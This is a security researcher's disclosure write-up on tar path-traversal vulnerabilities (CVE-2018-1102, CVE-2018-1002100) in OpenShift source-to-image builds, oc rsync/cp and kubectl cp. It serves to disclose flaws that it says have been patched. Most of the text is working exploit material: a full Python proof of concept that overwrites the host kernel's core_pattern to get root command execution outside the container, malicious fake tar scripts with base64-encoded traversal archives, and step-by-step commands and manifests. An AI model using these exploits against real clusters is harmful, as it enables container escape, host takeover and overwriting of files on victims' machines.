Author: Michael Hanselmann. Updated: May 4, 2018.

OpenShift source-to-image (S2I/STI) builds allow an unprivileged user to build Docker images on an OpenShift cluster. Unlike normal Docker builds these don't require privileged access to a Docker socket and daemon. All user-controlled code is run with reduced privileges.

In OpenShift Container Platform 3.0 up to and including 3.9 the S2I builder contained a vulnerability allowing an attacker to gain root access to the host system, that is even outside any Docker container. Its reference is CVE-2018-1102. Red Hat has fixed the vulnerability in the following OpenShift errata releases on April 27, 2018:

OpenShift Online 3.x and OpenShift Dedicated 3.x were also affected and have been patched by Red Hat.

The underlying cause is comparable to an issue in Kubernetes' kubectl cp command I found and reported in March 2018 (Kubernetes issue 61297, Red Hat bug 1564305, reference CVE-2018-1002100). The same code can be found in OpenShift's oc cp command and OpenShift's oc rsync command was vulnerable too.

Gaining root on host through source-to-image build

The source-to-image builder supports incremental builds. It does so by looking for a script named save-artifacts in the last image built by a build configuration. The archive unpacking code in openshift/source-to-image/pkg/tar/tar.go:ExtractTarStreamFromTarReader passed filenames from tar headers as input to filepath.Join without further sanitization. The same code is used by oc rsync, making it equally exploitable.

Engineering a build to emit a malicious tar archive from save-artifacts was almost trivial. The main challenge was that the S2I builder makes exactly one call to the execve(2) system call to invoke bsdtar, and that's well before the artifacts are unpacked and can insert or replace executables. No dynamic library is loaded either.

The proof of concept exploit now relies on the fact that the builder container can overwrite the kernel's core_pattern, described in more detail in core(5). Once that's done the build triggers a core dump and the kernel executes the command previously written to core_pattern in the context of the host system. Here we'll only use an Nginx container, but it'd be trivial to start a custom image in a privileged container with the host filesystem mounted.

The original report was reproduced against OpenShift Container Platform v3.6.173.0.96 and v3.7.23.

Reproduction

  1. Create a new project (depending on cluster environment this is done another way, i.e. through a control panel):
    master$ oc new-project --skip-config-write poc
    
  2. Assuming the client now has access to the newly created project we'll create the necessary objects:
    client$ oc -n poc create -f - <<'EOF'
    apiVersion: v1
    kind: List
    items:
    
    - apiVersion: v1
      kind: ImageStream
      metadata:
        name: poc
      spec:
        lookupPolicy:
          local: false
    
    - apiVersion: v1
      kind: BuildConfig
      metadata:
        name: poc
      spec:
        failedBuildsHistoryLimit: 3
        successfulBuildsHistoryLimit: 3
        nodeSelector: {}
        runPolicy: Serial
        source:
          type: Binary
          binary:
            asFile: ""
        strategy:
          type: Source
          sourceStrategy:
            from:
              kind: ImageStreamTag
              namespace: openshift
              name: php:7.0
            incremental: true
            env:
              - name: BUILD_LOGLEVEL
                value: "7"
        output:
          to:
            kind: ImageStreamTag
            name: poc:latest
    EOF
    
  3. For easier observation it's recommended to pin the builds to a specific host, though this isn't strictly necessary:
    client$ oc -n poc patch bc/poc --type=strategic --patch='{ "spec": {
      "nodeSelector": { "kubernetes.io/hostname": "node.example.com" }}}'
    
  4. Assuming the build was pinned to a host, log onto that host and verify that nothing runs on port 8080:
    node$ curl --show-error --silent http://localhost:8080 | head -n2
    curl: (7) Failed connect to localhost:8080; Connection refused
    
  5. We'll need a Python script to generate the build input:
    client$ cat >poc.py <<'EOF'
    #!/usr/bin/python3
    #
    # Copyright (C) 2018, Michael Hanselmann <https://hansmi.ch/>
    
    import os
    import shutil
    import sys
    import tarfile
    import tempfile
    import base64
    
    
    # This command runs in the context of the host system, thus we need to use
    # a command already available (unless we know the path of a file we can
    # control). Docker containers can be made privileged and can mount the host
    # filesystem.
    CORE_PATTERN = "|/bin/docker run -d --name demo -p 8080:80 nginx"
    
    # "core_pattern" may be at most 128 characters long, see core(5)
    assert len(CORE_PATTERN) <= 128
    
    
    with tempfile.NamedTemporaryFile() as tmpbinarytar, \
         tarfile.TarFile.open(tmpbinarytar.name, "w") as binarytar, \
         tempfile.NamedTemporaryFile() as tmpinnertar, \
         tarfile.TarFile.open(tmpinnertar.name, "w") as innertar:
    
      # Marker file to detect when a build used "save-artifacts"
      with tempfile.NamedTemporaryFile() as empty:
        empty.write(b"marker")
        empty.flush()
        innertar.add(empty.name, arcname="artifactmarker")
    
      # Just for fun: redirect write to /proc via symlink; writing directly to
      # "../../../../../proc/sys/..." would also work
      link = tarfile.TarInfo()
      link.name = "proc"
      link.type = tarfile.SYMTYPE
      link.linkname = "../../../../../../../../proc"
      innertar.addfile(link)
    
      with tempfile.NamedTemporaryFile() as corepattern:
        corepattern.write(CORE_PATTERN.encode("ascii"))
        corepattern.flush()
        innertar.add(corepattern.name, arcname="proc/sys/kernel/core_pattern")
    
      innertar.close()
    
      with tempfile.NamedTemporaryFile() as script:
        script.write("""#!/bin/bash
    base64 -d <<'EOF'
    """.encode("ascii"))
        script.write(base64.b64encode(open(tmpinnertar.name, 'rb').read()))
        script.write(b"""
    EOF
    """)
        script.flush()
        os.chmod(script.name, 0o755)
        binarytar.add(script.name, arcname=".s2i/bin/save-artifacts")
    
      with tempfile.NamedTemporaryFile() as script:
        script.write("""#!/bin/bash
    
    find /tmp -type f | sort
    echo
    cat /proc/sys/kernel/core_pattern
    echo
    
    if test -e /tmp/artifacts/artifactmarker && [ "$(< /proc/sys/kernel/core_pattern)" == '{0}' ]; then
      # Trigger core pattern
      bash -c 'ulimit -c unlimited; kill -ABRT $$'; echo $?
    
      sleep 2
    fi
    
    exit 0
    """.format(CORE_PATTERN).encode("ascii"))
        script.flush()
        os.chmod(script.name, 0o755)
        binarytar.add(script.name, arcname=".s2i/bin/assemble")
    
      binarytar.close()
    
      tmpbinarytar.seek(0)
    
      shutil.copyfileobj(tmpbinarytar, sys.stdout.buffer)
    EOF
    
  6. Now we start the first build to put the malicious save-artifacts script in position. The result of this build is pushed to the cluster-internal registry.
    client$ python3 poc.py | oc -n poc start-build --follow --wait --from-archive=- poc
    
  7. Once finished we go for the kill. This second build will retrieve artifacts from the first build and by unpacking those overwrites the kernel's core_pattern. The assemble script will detect that the settings are in place and will trigger a core dump.
    client$ python3 poc.py | oc -n poc start-build --follow --wait --from-archive=- poc
    
  8. Give the system a few seconds (or more if the image needs to be fetched) and then check on the node again:
    node$ curl --show-error --silent http://localhost:8080 | head -n2
    <!DOCTYPE html>
    <html>
    
    This Nginx server in a container was started by a source-to-image build which isn't supposed to have this kind of access.

Exploiting path traversal in kubectl cp

The kubectl cp command uses the tar program installed within a container to create an archive. It then proceeds to unpack the archive on the client. When the container is controlled by a malicious party who can get a victim to copy any file from a container, i.e. for debugging, they could overwrite any file writable by the victim and whose path can be predicted.

This behaviour can be confirmed in kubectl v1.9.5 as well as Red Hat's OpenShift Origin 3.7.2, a downstream consumer of Kubernetes code. It's a result of the code in kubernetes/pkg/kubectl/cmd/cp.go:untarAll using unsanitized filenames from the tar headers as input to filepath.Join. It's been fixed in Kubernetes 1.9.6 and 1.10 (Kubernetes issue 61297).

The client code doesn't set the file mode, hence the PoC uses a plain text file. If the attacker knows the path of an executable writable by the victim (or the latter runs the client as root), executables can be replaced and code execution on the client is gained. There are ways to gain code execution from non-executable files.

While not demonstrated, it's to be expected that a modified and malicious K8s API server could inject arbitrary files into any program execution request originating from a file copy and wouldn't even need a prepared and explicitly requested container.

Reproduction

  1. Set up a Kubernetes 1.9.5 cluster within a virtual machine using the instructions in the upstream documentation
  2. For the sake of simplicity we'll use a busybox container and patch it manually, but obviously the malicious tar program could be part of the image (including a widely used base image) and be more advanced than used for the demonstration.
    $ kubectl create -f - <<'EOF'
    apiVersion: extensions/v1beta1
    kind: Deployment
    metadata:
      name: poc
      namespace: default
    spec:
      replicas: 1
      selector:
        matchLabels:
          app: poc
      template:
        metadata:
          creationTimestamp: null
          labels:
            app: poc
        spec:
          containers:
          - command:
            - /bin/sh
            - -c
            - while sleep 1000; do :; done
            image: docker.io/library/busybox:latest
            imagePullPolicy: Always
            name: busybox
            volumeMounts:
            - mountPath: /usr/local/sbin
              name: store
          dnsPolicy: ClusterFirst
          restartPolicy: Always
          schedulerName: default-scheduler
          securityContext: {}
          terminationGracePeriodSeconds: 30
          volumes:
          - emptyDir: {}
            name: store
    EOF
    
  3. Generate a script to simulate a tar program. We're using a Python program to generate shell script. Write the result into the container and make it executable. An example output follows.
    #!/usr/bin/python3
    
    import tarfile
    import tempfile
    import os
    import base64
    
    with tempfile.NamedTemporaryFile() as tmpfile, \
         tarfile.TarFile.gzopen(tmpfile.name, "w") as tar:
      with tempfile.NamedTemporaryFile() as text:
        text.write(b"Hello World\n")
        text.flush()
    
        tar.add(text.name,
          arcname="../../../../../../../var/tmp/unexpected")
    
      tar.close()
    
      print("#!/bin/sh")
      print("base64 -d <<EOF | gunzip -c")
      print(base64.b64encode(open(tmpfile.name, 'rb').read()).
        decode("ascii"))
      print("EOF")
    
    Example:
    $ kubectl exec -it poc-... /bin/sh
    
    # Run within container
    $ cat >/usr/local/sbin/tar <<'EOTAR' && chmod +x /usr/local/sbin/tar
    #!/bin/sh
    base64 -d <<EOF | gunzip -c
    H4sICHzQqVoC/3RtcGF5dmlhajdhAO3PQQrCMBCF4Vl7ipwgmTRNewVv4LrY7KopMRWPb3F
    pQReCUPg/HrzFzOZZ6+wm96G4epndck2POZ1rGuUXuupUX63bVvWt+NDEJkT1fSvqu9BHMS
    p/sNzqUIyRknP99Pft/j5uJ45pmrI55TKNBwEAAAAAAAAAAAAAAAAA7MYTXHs6TAAoAAA=
    EOF
    EOTAR
    
  4. Verify that PoC-generated file doesn't exist on client system.
    $ stat /var/tmp/unexpected
    stat: cannot stat '/var/tmp/unexpected': No such file or directory
    
  5. Now comes the part which would've to be done by the victim: copy a file from the container. The PoC code doesn't care about the source file or directory.
    $ kubectl cp poc-...:/etc/hosts /tmp/container-hosts
    
  6. A file has been written in /var/tmp on the client system:
    $ cat /var/tmp/unexpected
    Hello World
    

Exploiting path traversal in oc cp and oc rsync

The oc rsync command, just like kubectl cp, uses the tar program installed within a container to create an archive. See the section on exploiting kubectl cp for more details. oc cp is the same underlying code as kubectl cp.

oc rsync uses the same archive unpacking code as the source-to-image builder. The focus was on producing an exploit for the latter, but for demonstration purposes a proof-of-concept exploit was made nonetheless. It's a result of the archive unpacking code in openshift/source-to-image/pkg/tar/tar.go:ExtractTarStreamFromTarReader using unsanitized filenames from tar headers as input to filepath.Join.

The original report used the following reproduction environment, though far more versions were vulnerable:

Reproduction for oc rsync

This demonstration uses oc rsync. oc cp can be exploited by combining the pod setup here with the instructions from kubectl cp.

  1. Create a new project (depending on cluster environment this is done another way, i.e. through a control panel):
    $ oc new-project --skip-config-write poc
    
  2. Assuming the client now has access to the newly created project we'll create the necessary objects. The container is already pre-configured with a malicious tar program which was generated using the Python script already used for kubectl cp.
    $ oc -n poc create -f - <<'EOF'
    apiVersion: v1
    kind: List
    items:
    
    - apiVersion: v1
      kind: ConfigMap
      metadata:
        name: override
      data:
        tar: |
          #!/bin/sh
          base64 -d <<EOF | gunzip -c
          H4sICP8WvloC/3RtcGhwZ3d6dmV4AO3PQQrCMBCF4Vl7ipwgmZjYXMEbuC42u2pKTMXjW1xa0IUg
          FP6PB28xs3nWOrvKva+uXSY3X/NjyueWB/mFLjrVV+u6VX0UH/aHFH0IKYn6LmoSo/IH86311Rip
          pbRPf9/u7+M24pjHsZhTqeOwEwAAAAAAAAAAAAAAAADAZjwBJlLCbQAoAAA=
          EOF
    
    - apiVersion: v1
      kind: DeploymentConfig
      metadata:
        name: rsyncpoc
      spec:
        replicas: 1
        selector:
          deployment-config.name: rsyncpoc
        strategy:
          type: Rolling
        template:
          metadata:
            labels:
              deployment-config.name: rsyncpoc
          spec:
            containers:
            - image: busybox
              imagePullPolicy: Always
              command:
                - /bin/sh
                - -c
                - while sleep 1000; do :; done
              name: default-container
              resources: {}
              terminationMessagePath: /dev/termination-log
              terminationMessagePolicy: File
              volumeMounts:
                - name: override
                  readOnly: true
                  mountPath: /usr/local/sbin
            dnsPolicy: ClusterFirst
            restartPolicy: Always
            schedulerName: default-scheduler
            securityContext: {}
            terminationGracePeriodSeconds: 30
            volumes:
            - name: override
              configMap:
                defaultMode: 420
                name: override
                items:
                  - key: tar
                    path: tar
                    mode: 0555
        test: false
        triggers:
          - type: ConfigChange
    EOF
    
  3. Verify that PoC-generated file doesn't exist on client system.
    $ stat /var/tmp/unexpected
    stat: cannot stat '/var/tmp/unexpected': No such file or directory
    
  4. This part would've to be done by the victim: copy a file from the container. The PoC code doesn't care about the source file or directory. Get the actual pod name first using oc -n poc get pod.
    $ oc -n poc rsync rsyncpoc-...:/foo /tmp/
    
  5. A file has been written in /var/tmp on the client system:
    $ cat /var/tmp/unexpected
    Hello World